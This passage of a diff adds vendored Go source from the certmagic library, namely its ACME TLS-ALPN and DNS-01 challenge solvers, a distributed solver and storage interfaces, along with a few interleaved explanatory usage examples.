// we pre-generate the certificate for efficiency with multi-perspective
|
||||
// validation, so it only has to be done once (at least, by this instance;
|
||||
// distributed solving does not have that luxury, oh well) - update the
|
||||
// challenge data in memory to be the generated certificate
|
||||
cert, err := acmez.TLSALPN01ChallengeCert(chal)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
key := challengeKey(chal)
|
||||
activeChallengesMu.Lock()
|
||||
chalData := activeChallenges[key]
|
||||
chalData.data = cert
|
||||
activeChallenges[key] = chalData
|
||||
activeChallengesMu.Unlock()
|
||||
|
||||
// the rest of this function increments the
|
||||
// challenge count for the solver at this
|
||||
// listener address, and if necessary, starts
|
||||
// a simple TLS server
|
||||
|
||||
solversMu.Lock()
|
||||
defer solversMu.Unlock()
|
||||
|
||||
si := getSolverInfo(s.address)
|
||||
si.count++
|
||||
if si.listener != nil {
|
||||
return nil // already being served by us
|
||||
}
|
||||
|
||||
// notice the unusual error handling here; we
|
||||
// only continue to start a challenge server if
|
||||
// we got a listener; in all other cases return
|
||||
ln, err := robustTryListen(s.address)
|
||||
if ln == nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// we were able to bind the socket, so make it into a TLS
|
||||
// listener, store it with the solverInfo, and start the
|
||||
// challenge server
|
||||
|
||||
si.listener = tls.NewListener(ln, s.config.TLSConfig())
|
||||
|
||||
go func() {
|
||||
defer func() {
|
||||
if err := recover(); err != nil {
|
||||
buf := make([]byte, stackTraceBufferSize)
|
||||
buf = buf[:runtime.Stack(buf, false)]
|
||||
log.Printf("panic: tls-alpn solver server: %v\n%s", err, buf)
|
||||
}
|
||||
}()
|
||||
defer close(si.done)
|
||||
for {
|
||||
conn, err := si.listener.Accept()
|
||||
if err != nil {
|
||||
if atomic.LoadInt32(&si.closed) == 1 {
|
||||
return
|
||||
}
|
||||
log.Printf("[ERROR] TLS-ALPN challenge server: accept: %v", err)
|
||||
continue
|
||||
}
|
||||
go s.handleConn(conn)
|
||||
}
|
||||
}()
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// handleConn completes the TLS handshake and then closes conn.
|
||||
func (*tlsALPNSolver) handleConn(conn net.Conn) {
|
||||
defer func() {
|
||||
if err := recover(); err != nil {
|
||||
buf := make([]byte, stackTraceBufferSize)
|
||||
buf = buf[:runtime.Stack(buf, false)]
|
||||
log.Printf("panic: tls-alpn solver handler: %v\n%s", err, buf)
|
||||
}
|
||||
}()
|
||||
defer conn.Close()
|
||||
tlsConn, ok := conn.(*tls.Conn)
|
||||
if !ok {
|
||||
log.Printf("[ERROR] TLS-ALPN challenge server: expected tls.Conn but got %T: %#v", conn, conn)
|
||||
return
|
||||
}
|
||||
err := tlsConn.Handshake()
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] TLS-ALPN challenge server: handshake: %v", err)
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
// CleanUp removes the challenge certificate from the cache, and if
|
||||
// it is the last one to finish, stops the TLS server.
|
||||
func (s *tlsALPNSolver) CleanUp(ctx context.Context, chal acme.Challenge) error {
|
||||
solversMu.Lock()
|
||||
defer solversMu.Unlock()
|
||||
si := getSolverInfo(s.address)
|
||||
si.count--
|
||||
if si.count == 0 {
|
||||
// last one out turns off the lights
|
||||
atomic.StoreInt32(&si.closed, 1)
|
||||
if si.listener != nil {
|
||||
si.listener.Close()
|
||||
<-si.done
|
||||
}
|
||||
delete(solvers, s.address)
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// DNS01Solver is a type that makes libdns providers usable
// as ACME dns-01 challenge solvers.
// See https://github.com/libdns/libdns
type DNS01Solver struct {
	// The implementation that interacts with the DNS
	// provider to set or delete records. (REQUIRED)
	DNSProvider ACMEDNSProvider

	// The TTL for the temporary challenge records.
	TTL time.Duration

	// How long to wait before starting propagation checks.
	// Default: 0 (no wait).
	PropagationDelay time.Duration

	// Maximum time to wait for temporary DNS record to appear.
	// Set to -1 to disable propagation checks.
	// Default: 2 minutes.
	PropagationTimeout time.Duration

	// Preferred DNS resolver(s) to use when doing DNS lookups.
	Resolvers []string

	// Override the domain to set the TXT record on. This is
	// to delegate the challenge to a different domain. Note
	// that the solver doesn't follow CNAME/NS records.
	OverrideDomain string

	txtRecords   map[string]dnsPresentMemory // keyed by domain name
	txtRecordsMu sync.Mutex
}
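As an aside, here is a minimal sketch of how a caller might wire this solver up. The libdns Cloudflare provider and the environment variable name are assumptions made for illustration; only the DNS01Solver fields come from the struct above.

```go
// Editor's illustration only, not part of certmagic: configuring dns-01 solving
// with an assumed libdns provider (github.com/libdns/cloudflare).
package dnsexample

import (
	"os"
	"time"

	"github.com/caddyserver/certmagic"
	"github.com/libdns/cloudflare"
)

func newDNSIssuer() *certmagic.ACMEIssuer {
	solver := &certmagic.DNS01Solver{
		DNSProvider:        &cloudflare.Provider{APIToken: os.Getenv("CLOUDFLARE_API_TOKEN")},
		TTL:                5 * time.Minute,
		PropagationDelay:   30 * time.Second, // optional pause before propagation checks
		PropagationTimeout: 2 * time.Minute,  // the documented default when left at zero
	}
	cfg := certmagic.NewDefault()
	return certmagic.NewACMEIssuer(cfg, certmagic.ACMEIssuer{DNS01Solver: solver})
}
```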
|
||||
|
||||
// Present creates the DNS TXT record for the given ACME challenge.
|
||||
func (s *DNS01Solver) Present(ctx context.Context, challenge acme.Challenge) error {
|
||||
dnsName := challenge.DNS01TXTRecordName()
|
||||
if s.OverrideDomain != "" {
|
||||
dnsName = s.OverrideDomain
|
||||
}
|
||||
keyAuth := challenge.DNS01KeyAuthorization()
|
||||
|
||||
// multiple identifiers can have the same ACME challenge
|
||||
// domain (e.g. example.com and *.example.com) so we need
|
||||
// to ensure that we don't solve those concurrently and
|
||||
// step on each challenges' metaphorical toes; see
|
||||
// https://github.com/caddyserver/caddy/issues/3474
|
||||
activeDNSChallenges.Lock(dnsName)
|
||||
|
||||
zone, err := findZoneByFQDN(dnsName, recursiveNameservers(s.Resolvers))
|
||||
if err != nil {
|
||||
return fmt.Errorf("could not determine zone for domain %q: %v", dnsName, err)
|
||||
}
|
||||
|
||||
rec := libdns.Record{
|
||||
Type: "TXT",
|
||||
Name: libdns.RelativeName(dnsName+".", zone),
|
||||
Value: keyAuth,
|
||||
TTL: s.TTL,
|
||||
}
|
||||
|
||||
results, err := s.DNSProvider.AppendRecords(ctx, zone, []libdns.Record{rec})
|
||||
if err != nil {
|
||||
return fmt.Errorf("adding temporary record for zone %s: %w", zone, err)
|
||||
}
|
||||
if len(results) != 1 {
|
||||
return fmt.Errorf("expected one record, got %d: %v", len(results), results)
|
||||
}
|
||||
|
||||
// remember the record and zone we got so we can clean up more efficiently
|
||||
s.txtRecordsMu.Lock()
|
||||
if s.txtRecords == nil {
|
||||
s.txtRecords = make(map[string]dnsPresentMemory)
|
||||
}
|
||||
s.txtRecords[dnsName] = dnsPresentMemory{dnsZone: zone, rec: results[0]}
|
||||
s.txtRecordsMu.Unlock()
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// Wait blocks until the TXT record created in Present() appears in
|
||||
// authoritative lookups, i.e. until it has propagated, or until
|
||||
// timeout, whichever is first.
|
||||
func (s *DNS01Solver) Wait(ctx context.Context, challenge acme.Challenge) error {
|
||||
// if configured to, pause before doing propagation checks
|
||||
// (even if they are disabled, the wait might be desirable on its own)
|
||||
if s.PropagationDelay > 0 {
|
||||
select {
|
||||
case <-time.After(s.PropagationDelay):
|
||||
case <-ctx.Done():
|
||||
return ctx.Err()
|
||||
}
|
||||
}
|
||||
|
||||
// skip propagation checks if configured to do so
|
||||
if s.PropagationTimeout == -1 {
|
||||
return nil
|
||||
}
|
||||
|
||||
// prepare for the checks by determining what to look for
|
||||
dnsName := challenge.DNS01TXTRecordName()
|
||||
if s.OverrideDomain != "" {
|
||||
dnsName = s.OverrideDomain
|
||||
}
|
||||
keyAuth := challenge.DNS01KeyAuthorization()
|
||||
|
||||
// timings
|
||||
timeout := s.PropagationTimeout
|
||||
if timeout == 0 {
|
||||
timeout = 2 * time.Minute
|
||||
}
|
||||
const interval = 2 * time.Second
|
||||
|
||||
// how we'll do the checks
|
||||
resolvers := recursiveNameservers(s.Resolvers)
|
||||
|
||||
var err error
|
||||
start := time.Now()
|
||||
for time.Since(start) < timeout {
|
||||
select {
|
||||
case <-time.After(interval):
|
||||
case <-ctx.Done():
|
||||
return ctx.Err()
|
||||
}
|
||||
var ready bool
|
||||
ready, err = checkDNSPropagation(dnsName, keyAuth, resolvers)
|
||||
if err != nil {
|
||||
return fmt.Errorf("checking DNS propagation of %s: %w", dnsName, err)
|
||||
}
|
||||
if ready {
|
||||
return nil
|
||||
}
|
||||
}
|
||||
|
||||
return fmt.Errorf("timed out waiting for record to fully propagate; verify DNS provider configuration is correct - last error: %v", err)
|
||||
}
|
||||
|
||||
// CleanUp deletes the DNS TXT record created in Present().
|
||||
func (s *DNS01Solver) CleanUp(ctx context.Context, challenge acme.Challenge) error {
|
||||
dnsName := challenge.DNS01TXTRecordName()
|
||||
|
||||
defer func() {
|
||||
// always forget about it so we don't leak memory
|
||||
s.txtRecordsMu.Lock()
|
||||
delete(s.txtRecords, dnsName)
|
||||
s.txtRecordsMu.Unlock()
|
||||
|
||||
// always do this last - but always do it!
|
||||
activeDNSChallenges.Unlock(dnsName)
|
||||
}()
|
||||
|
||||
// recall the record we created and zone we looked up
|
||||
s.txtRecordsMu.Lock()
|
||||
memory, ok := s.txtRecords[dnsName]
|
||||
if !ok {
|
||||
s.txtRecordsMu.Unlock()
|
||||
return fmt.Errorf("no memory of presenting a DNS record for %s (probably OK if presenting failed)", challenge.Identifier.Value)
|
||||
}
|
||||
s.txtRecordsMu.Unlock()
|
||||
|
||||
// clean up the record
|
||||
_, err := s.DNSProvider.DeleteRecords(ctx, memory.dnsZone, []libdns.Record{memory.rec})
|
||||
if err != nil {
|
||||
return fmt.Errorf("deleting temporary record for zone %s: %w", memory.dnsZone, err)
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
type dnsPresentMemory struct {
|
||||
dnsZone string
|
||||
rec libdns.Record
|
||||
}
|
||||
|
||||
// ACMEDNSProvider defines the set of operations required for
|
||||
// ACME challenges. A DNS provider must be able to append and
|
||||
// delete records in order to solve ACME challenges. Find one
|
||||
// you can use at https://github.com/libdns. If your provider
|
||||
// isn't implemented yet, feel free to contribute!
|
||||
type ACMEDNSProvider interface {
|
||||
libdns.RecordAppender
|
||||
libdns.RecordDeleter
|
||||
}
|
||||
|
||||
// activeDNSChallenges synchronizes DNS challenges for
|
||||
// names to ensure that challenges for the same ACME
|
||||
// DNS name do not overlap; for example, the TXT record
|
||||
// to make for both example.com and *.example.com are
|
||||
// the same; thus we cannot solve them concurrently.
|
||||
var activeDNSChallenges = newMapMutex()
|
||||
|
||||
// mapMutex implements named mutexes.
|
||||
type mapMutex struct {
|
||||
cond *sync.Cond
|
||||
set map[interface{}]struct{}
|
||||
}
|
||||
|
||||
func newMapMutex() *mapMutex {
|
||||
return &mapMutex{
|
||||
cond: sync.NewCond(new(sync.Mutex)),
|
||||
set: make(map[interface{}]struct{}),
|
||||
}
|
||||
}
|
||||
|
||||
func (mmu *mapMutex) Lock(key interface{}) {
|
||||
mmu.cond.L.Lock()
|
||||
defer mmu.cond.L.Unlock()
|
||||
for mmu.locked(key) {
|
||||
mmu.cond.Wait()
|
||||
}
|
||||
mmu.set[key] = struct{}{}
|
||||
}
|
||||
|
||||
func (mmu *mapMutex) Unlock(key interface{}) {
|
||||
mmu.cond.L.Lock()
|
||||
defer mmu.cond.L.Unlock()
|
||||
delete(mmu.set, key)
|
||||
mmu.cond.Broadcast()
|
||||
}
|
||||
|
||||
func (mmu *mapMutex) locked(key interface{}) (ok bool) {
|
||||
_, ok = mmu.set[key]
|
||||
return
|
||||
}
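As a quick illustration (editor's note, not in the source), the named mutex above is used elsewhere in this file roughly like so, serializing challenge work per DNS record name:

```go
// Per-name serialization inside this package (sketch):
activeDNSChallenges.Lock("_acme-challenge.example.com")
// ... create the TXT record, wait for propagation, let the CA validate ...
activeDNSChallenges.Unlock("_acme-challenge.example.com")
```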
|
||||
|
||||
// distributedSolver allows the ACME HTTP-01 and TLS-ALPN challenges
// to be solved by an instance other than the one which initiated it.
// This is useful behind load balancers or in other cluster/fleet
// configurations. The only requirement is that the instance which
// initiates the challenge shares the same storage and locker with
// the others in the cluster. The storage backing the certificate
// cache in distributedSolver.config is crucial.
//
// Obviously, the instance which completes the challenge must be
// serving on the HTTPChallengePort for the HTTP-01 challenge or the
// TLSALPNChallengePort for the TLS-ALPN-01 challenge (or have all
// the packets port-forwarded) to receive and handle the request. The
// server which receives the challenge must handle it by checking to
// see if the challenge token exists in storage, and if so, decode it
// and use it to serve up the correct response. HTTPChallengeHandler
// in this package as well as the GetCertificate method implemented
// by a Config support and even require this behavior.
//
// In short: the only two requirements for cluster operation are
// sharing sync and storage, and using the facilities provided by
// this package for solving the challenges.
type distributedSolver struct {
	// The storage backing the distributed solver. It must be
	// the same storage configuration as what is solving the
	// challenge in order to be effective.
	storage Storage

	// The storage key prefix, associated with the issuer
	// that is solving the challenge.
	storageKeyIssuerPrefix string

	// Since the distributedSolver is only a
	// wrapper over an actual solver, place
	// the actual solver here.
	solver acmez.Solver
}
|
||||
|
||||
// Present invokes the underlying solver's Present method
|
||||
// and also stores domain, token, and keyAuth to the storage
|
||||
// backing the certificate cache of dhs.acmeIssuer.
|
||||
func (dhs distributedSolver) Present(ctx context.Context, chal acme.Challenge) error {
|
||||
infoBytes, err := json.Marshal(chal)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
err = dhs.storage.Store(ctx, dhs.challengeTokensKey(challengeKey(chal)), infoBytes)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
err = dhs.solver.Present(ctx, chal)
|
||||
if err != nil {
|
||||
return fmt.Errorf("presenting with embedded solver: %v", err)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// Wait wraps the underlying solver's Wait() method, if any. Implements acmez.Waiter.
|
||||
func (dhs distributedSolver) Wait(ctx context.Context, challenge acme.Challenge) error {
|
||||
if waiter, ok := dhs.solver.(acmez.Waiter); ok {
|
||||
return waiter.Wait(ctx, challenge)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// CleanUp invokes the underlying solver's CleanUp method
|
||||
// and also cleans up any assets saved to storage.
|
||||
func (dhs distributedSolver) CleanUp(ctx context.Context, chal acme.Challenge) error {
|
||||
err := dhs.storage.Delete(ctx, dhs.challengeTokensKey(challengeKey(chal)))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
err = dhs.solver.CleanUp(ctx, chal)
|
||||
if err != nil {
|
||||
return fmt.Errorf("cleaning up embedded provider: %v", err)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// challengeTokensPrefix returns the key prefix for challenge info.
|
||||
func (dhs distributedSolver) challengeTokensPrefix() string {
|
||||
return path.Join(dhs.storageKeyIssuerPrefix, "challenge_tokens")
|
||||
}
|
||||
|
||||
// challengeTokensKey returns the key to use to store and access
|
||||
// challenge info for domain.
|
||||
func (dhs distributedSolver) challengeTokensKey(domain string) string {
|
||||
return path.Join(dhs.challengeTokensPrefix(), StorageKeys.Safe(domain)+".json")
|
||||
}
|
||||
|
||||
// solverInfo associates a listener with the
|
||||
// number of challenges currently using it.
|
||||
type solverInfo struct {
|
||||
closed int32 // accessed atomically
|
||||
count int
|
||||
listener net.Listener
|
||||
done chan struct{} // used to signal when our own solver server is done
|
||||
}
|
||||
|
||||
// getSolverInfo gets a valid solverInfo struct for address.
|
||||
func getSolverInfo(address string) *solverInfo {
|
||||
si, ok := solvers[address]
|
||||
if !ok {
|
||||
si = &solverInfo{done: make(chan struct{})}
|
||||
solvers[address] = si
|
||||
}
|
||||
return si
|
||||
}
|
||||
|
||||
// robustTryListen calls net.Listen for a TCP socket at addr.
|
||||
// This function may return both a nil listener and a nil error!
|
||||
// If it was able to bind the socket, it returns the listener
|
||||
// and no error. If it wasn't able to bind the socket because
|
||||
// the socket is already in use, then it returns a nil listener
|
||||
// and nil error. If it had any other error, it returns the
|
||||
// error. The intended error handling logic for this function
|
||||
// is to proceed if the returned listener is not nil; otherwise
|
||||
// return err (which may also be nil). In other words, this
|
||||
// function ignores errors if the socket is already in use,
|
||||
// which is useful for our challenge servers, where we assume
|
||||
// that whatever is already listening can solve the challenges.
|
||||
func robustTryListen(addr string) (net.Listener, error) {
|
||||
var listenErr error
|
||||
for i := 0; i < 2; i++ {
|
||||
// doesn't hurt to sleep briefly before the second
|
||||
// attempt in case the OS has timing issues
|
||||
if i > 0 {
|
||||
time.Sleep(100 * time.Millisecond)
|
||||
}
|
||||
|
||||
// if we can bind the socket right away, great!
|
||||
var ln net.Listener
|
||||
ln, listenErr = net.Listen("tcp", addr)
|
||||
if listenErr == nil {
|
||||
return ln, nil
|
||||
}
|
||||
|
||||
// if it failed just because the socket is already in use, we
|
||||
// have no choice but to assume that whatever is using the socket
|
||||
// can answer the challenge already, so we ignore the error
|
||||
connectErr := dialTCPSocket(addr)
|
||||
if connectErr == nil {
|
||||
return nil, nil
|
||||
}
|
||||
|
||||
// hmm, we couldn't connect to the socket, so something else must
|
||||
// be wrong, right? wrong!! we've had reports across multiple OSes
|
||||
// now that sometimes connections fail even though the OS told us
|
||||
// that the address was already in use; either the listener is
|
||||
// fluctuating between open and closed very, very quickly, or the
|
||||
// OS is inconsistent and contradicting itself; I have been unable
|
||||
// to reproduce this, so I'm now resorting to hard-coding substring
|
||||
// matching in error messages as a really hacky and unreliable
|
||||
// safeguard against this, until we can identify exactly what was
|
||||
// happening; see the following threads for more info:
|
||||
// https://caddy.community/t/caddy-retry-error/7317
|
||||
// https://caddy.community/t/v2-upgrade-to-caddy2-failing-with-errors/7423
|
||||
if strings.Contains(listenErr.Error(), "address already in use") ||
|
||||
strings.Contains(listenErr.Error(), "one usage of each socket address") {
|
||||
log.Printf("[WARNING] OS reports a contradiction: %v - but we cannot connect to it, with this error: %v; continuing anyway 🤞 (I don't know what causes this... if you do, please help?)", listenErr, connectErr)
|
||||
return nil, nil
|
||||
}
|
||||
}
|
||||
return nil, fmt.Errorf("could not start listener for challenge server at %s: %v", addr, listenErr)
|
||||
}
|
||||
|
||||
// dialTCPSocket connects to a TCP address just for the sake of
|
||||
// seeing if it is open. It returns a nil error if a TCP connection
|
||||
// can successfully be made to addr within a short timeout.
|
||||
func dialTCPSocket(addr string) error {
|
||||
conn, err := net.DialTimeout("tcp", addr, 250*time.Millisecond)
|
||||
if err == nil {
|
||||
conn.Close()
|
||||
}
|
||||
return err
|
||||
}
|
||||
|
||||
// GetACMEChallenge returns an active ACME challenge for the given identifier,
|
||||
// or false if no active challenge for that identifier is known.
|
||||
func GetACMEChallenge(identifier string) (Challenge, bool) {
|
||||
activeChallengesMu.Lock()
|
||||
chalData, ok := activeChallenges[identifier]
|
||||
activeChallengesMu.Unlock()
|
||||
return chalData, ok
|
||||
}
|
||||
|
||||
// The active challenge solvers, keyed by listener address,
|
||||
// and protected by a mutex. Note that the creation of
|
||||
// solver listeners and the incrementing of their counts
|
||||
// are atomic operations guarded by this mutex.
|
||||
var (
|
||||
solvers = make(map[string]*solverInfo)
|
||||
solversMu sync.Mutex
|
||||
)
|
||||
|
||||
// activeChallenges holds information about all known, currently-active
|
||||
// ACME challenges, keyed by identifier. CertMagic guarantees that
|
||||
// challenges for the same identifier do not overlap, by its locking
|
||||
// mechanisms; thus if a challenge comes in for a certain identifier,
|
||||
// we can be confident that if this process initiated the challenge,
|
||||
// the correct information to solve it is in this map. (It may have
|
||||
// alternatively been initiated by another instance in a cluster, in
|
||||
// which case the distributed solver will take care of that.)
|
||||
var (
|
||||
activeChallenges = make(map[string]Challenge)
|
||||
activeChallengesMu sync.Mutex
|
||||
)
|
||||
|
||||
// Challenge is an ACME challenge, but optionally paired with
|
||||
// data that can make it easier or more efficient to solve.
|
||||
type Challenge struct {
|
||||
acme.Challenge
|
||||
data interface{}
|
||||
}
|
||||
|
||||
// challengeKey returns the map key for a given challenge; it is the identifier
|
||||
// unless it is an IP address using the TLS-ALPN challenge.
|
||||
func challengeKey(chal acme.Challenge) string {
|
||||
if chal.Type == acme.ChallengeTypeTLSALPN01 && chal.Identifier.Type == "ip" {
|
||||
reversed, err := dns.ReverseAddr(chal.Identifier.Value)
|
||||
if err == nil {
|
||||
return reversed[:len(reversed)-1] // strip off '.'
|
||||
}
|
||||
}
|
||||
return chal.Identifier.Value
|
||||
}
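As a concrete example of the IP special case: for a TLS-ALPN challenge whose identifier is the IP address 10.0.0.1, dns.ReverseAddr returns "1.0.0.10.in-addr.arpa.", the trailing dot is stripped, and that string becomes the map key; for ordinary DNS identifiers the key is simply the domain name itself.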
|
||||
|
||||
// solverWrapper should be used to wrap all challenge solvers so that
|
||||
// we can add the challenge info to memory; this makes challenges globally
|
||||
// solvable by a single HTTP or TLS server even if multiple servers with
|
||||
// different configurations/scopes need to get certificates.
|
||||
type solverWrapper struct{ acmez.Solver }
|
||||
|
||||
func (sw solverWrapper) Present(ctx context.Context, chal acme.Challenge) error {
|
||||
activeChallengesMu.Lock()
|
||||
activeChallenges[challengeKey(chal)] = Challenge{Challenge: chal}
|
||||
activeChallengesMu.Unlock()
|
||||
return sw.Solver.Present(ctx, chal)
|
||||
}
|
||||
|
||||
func (sw solverWrapper) Wait(ctx context.Context, chal acme.Challenge) error {
|
||||
if waiter, ok := sw.Solver.(acmez.Waiter); ok {
|
||||
return waiter.Wait(ctx, chal)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (sw solverWrapper) CleanUp(ctx context.Context, chal acme.Challenge) error {
|
||||
activeChallengesMu.Lock()
|
||||
delete(activeChallenges, challengeKey(chal))
|
||||
activeChallengesMu.Unlock()
|
||||
return sw.Solver.CleanUp(ctx, chal)
|
||||
}
|
||||
|
||||
// Interface guards
|
||||
var (
|
||||
_ acmez.Solver = (*solverWrapper)(nil)
|
||||
_ acmez.Waiter = (*solverWrapper)(nil)
|
||||
_ acmez.Waiter = (*distributedSolver)(nil)
|
||||
)
|
280
vendor/github.com/caddyserver/certmagic/storage.go
generated
vendored
Normal file
@ -0,0 +1,280 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"path"
|
||||
"regexp"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// Storage is a type that implements a key-value store.
// Keys are prefix-based, with forward slash '/' as separators
// and without a leading slash.
//
// Processes running in a cluster will wish to use the
// same Storage value (its implementation and configuration)
// in order to share certificates and other TLS resources
// with the cluster.
//
// The Load, Delete, List, and Stat methods should return
// fs.ErrNotExist if the key does not exist.
//
// Implementations of Storage must be safe for concurrent use
// and honor context cancellations.
type Storage interface {
	// Locker provides atomic synchronization
	// operations, making Storage safe to share.
	Locker

	// Store puts value at key.
	Store(ctx context.Context, key string, value []byte) error

	// Load retrieves the value at key.
	Load(ctx context.Context, key string) ([]byte, error)

	// Delete deletes key. An error should be
	// returned only if the key still exists
	// when the method returns.
	Delete(ctx context.Context, key string) error

	// Exists returns true if the key exists
	// and there was no error checking.
	Exists(ctx context.Context, key string) bool

	// List returns all keys that match prefix.
	// If recursive is true, non-terminal keys
	// will be enumerated (i.e. "directories"
	// should be walked); otherwise, only keys
	// prefixed exactly by prefix will be listed.
	List(ctx context.Context, prefix string, recursive bool) ([]string, error)

	// Stat returns information about key.
	Stat(ctx context.Context, key string) (KeyInfo, error)
}

// Locker facilitates synchronization of certificate tasks across
// machines and networks.
type Locker interface {
	// Lock acquires the lock for key, blocking until the lock
	// can be obtained or an error is returned. Note that, even
	// after acquiring a lock, an idempotent operation may have
	// already been performed by another process that acquired
	// the lock before - so always check to make sure idempotent
	// operations still need to be performed after acquiring the
	// lock.
	//
	// The actual implementation of obtaining a lock must be
	// an atomic operation so that multiple Lock calls at the
	// same time always result in only one caller receiving the
	// lock at any given time.
	//
	// To prevent deadlocks, all implementations (where this concern
	// is relevant) should put a reasonable expiration on the lock in
	// case Unlock is unable to be called due to some sort of network
	// failure or system crash. Additionally, implementations should
	// honor context cancellation as much as possible (in case the
	// caller wishes to give up and free resources before the lock
	// can be obtained).
	Lock(ctx context.Context, key string) error

	// Unlock releases the lock for key. This method must ONLY be
	// called after a successful call to Lock, and only after the
	// critical section is finished, even if it errored or timed
	// out. Unlock cleans up any resources allocated during Lock.
	Unlock(ctx context.Context, key string) error
}

// KeyInfo holds information about a key in storage.
// Key and IsTerminal are required; Modified and Size
// are optional if the storage implementation is not
// able to get that information. Setting them will
// make certain operations more consistent or
// predictable, but it is not crucial to basic
// functionality.
type KeyInfo struct {
	Key        string
	Modified   time.Time
	Size       int64
	IsTerminal bool // false for keys that only contain other keys (like directories)
}
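To make the contract concrete, here is a deliberately naive, partial sketch of a custom Storage backed by a map (editor's illustration, not part of certmagic). Locker, List, and Stat are omitted, and a real implementation must also persist data, honor context cancellation, and be safe to share across a cluster.

```go
// Editor's illustration: core read/write semantics of the Storage interface.
// Load must report missing keys with fs.ErrNotExist, per the contract above.
package storageexample

import (
	"context"
	"io/fs"
	"sync"
)

type memStorage struct {
	mu   sync.Mutex
	data map[string][]byte
}

func (m *memStorage) Store(_ context.Context, key string, value []byte) error {
	m.mu.Lock()
	defer m.mu.Unlock()
	if m.data == nil {
		m.data = make(map[string][]byte)
	}
	m.data[key] = append([]byte(nil), value...) // copy so callers can reuse their buffer
	return nil
}

func (m *memStorage) Load(_ context.Context, key string) ([]byte, error) {
	m.mu.Lock()
	defer m.mu.Unlock()
	v, ok := m.data[key]
	if !ok {
		return nil, fs.ErrNotExist // required by the interface contract
	}
	return v, nil
}

func (m *memStorage) Delete(_ context.Context, key string) error {
	m.mu.Lock()
	defer m.mu.Unlock()
	delete(m.data, key)
	return nil
}

func (m *memStorage) Exists(_ context.Context, key string) bool {
	m.mu.Lock()
	defer m.mu.Unlock()
	_, ok := m.data[key]
	return ok
}
```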
|
||||
|
||||
// storeTx stores all the values or none at all.
|
||||
func storeTx(ctx context.Context, s Storage, all []keyValue) error {
|
||||
for i, kv := range all {
|
||||
err := s.Store(ctx, kv.key, kv.value)
|
||||
if err != nil {
|
||||
for j := i - 1; j >= 0; j-- {
|
||||
s.Delete(ctx, all[j].key)
|
||||
}
|
||||
return err
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// keyValue pairs a key and a value.
|
||||
type keyValue struct {
|
||||
key string
|
||||
value []byte
|
||||
}
|
||||
|
||||
// KeyBuilder provides a namespace for methods that
|
||||
// build keys and key prefixes, for addressing items
|
||||
// in a Storage implementation.
|
||||
type KeyBuilder struct{}
|
||||
|
||||
// CertsPrefix returns the storage key prefix for
|
||||
// the given certificate issuer.
|
||||
func (keys KeyBuilder) CertsPrefix(issuerKey string) string {
|
||||
return path.Join(prefixCerts, keys.Safe(issuerKey))
|
||||
}
|
||||
|
||||
// CertsSitePrefix returns a key prefix for items associated with
|
||||
// the site given by domain using the given issuer key.
|
||||
func (keys KeyBuilder) CertsSitePrefix(issuerKey, domain string) string {
|
||||
return path.Join(keys.CertsPrefix(issuerKey), keys.Safe(domain))
|
||||
}
|
||||
|
||||
// SiteCert returns the path to the certificate file for domain
|
||||
// that is associated with the issuer with the given issuerKey.
|
||||
func (keys KeyBuilder) SiteCert(issuerKey, domain string) string {
|
||||
safeDomain := keys.Safe(domain)
|
||||
return path.Join(keys.CertsSitePrefix(issuerKey, domain), safeDomain+".crt")
|
||||
}
|
||||
|
||||
// SitePrivateKey returns the path to the private key file for domain
|
||||
// that is associated with the certificate from the given issuer with
|
||||
// the given issuerKey.
|
||||
func (keys KeyBuilder) SitePrivateKey(issuerKey, domain string) string {
|
||||
safeDomain := keys.Safe(domain)
|
||||
return path.Join(keys.CertsSitePrefix(issuerKey, domain), safeDomain+".key")
|
||||
}
|
||||
|
||||
// SiteMeta returns the path to the metadata file for domain that
|
||||
// is associated with the certificate from the given issuer with
|
||||
// the given issuerKey.
|
||||
func (keys KeyBuilder) SiteMeta(issuerKey, domain string) string {
|
||||
safeDomain := keys.Safe(domain)
|
||||
return path.Join(keys.CertsSitePrefix(issuerKey, domain), safeDomain+".json")
|
||||
}
|
||||
|
||||
// OCSPStaple returns a key for the OCSP staple associated
|
||||
// with the given certificate. If you have the PEM bundle
|
||||
// handy, pass that in to save an extra encoding step.
|
||||
func (keys KeyBuilder) OCSPStaple(cert *Certificate, pemBundle []byte) string {
|
||||
var ocspFileName string
|
||||
if len(cert.Names) > 0 {
|
||||
firstName := keys.Safe(cert.Names[0])
|
||||
ocspFileName = firstName + "-"
|
||||
}
|
||||
ocspFileName += fastHash(pemBundle)
|
||||
return path.Join(prefixOCSP, ocspFileName)
|
||||
}
|
||||
|
||||
// Safe standardizes and sanitizes str for use as
|
||||
// a single component of a storage key. This method
|
||||
// is idempotent.
|
||||
func (keys KeyBuilder) Safe(str string) string {
|
||||
str = strings.ToLower(str)
|
||||
str = strings.TrimSpace(str)
|
||||
|
||||
// replace a few specific characters
|
||||
repl := strings.NewReplacer(
|
||||
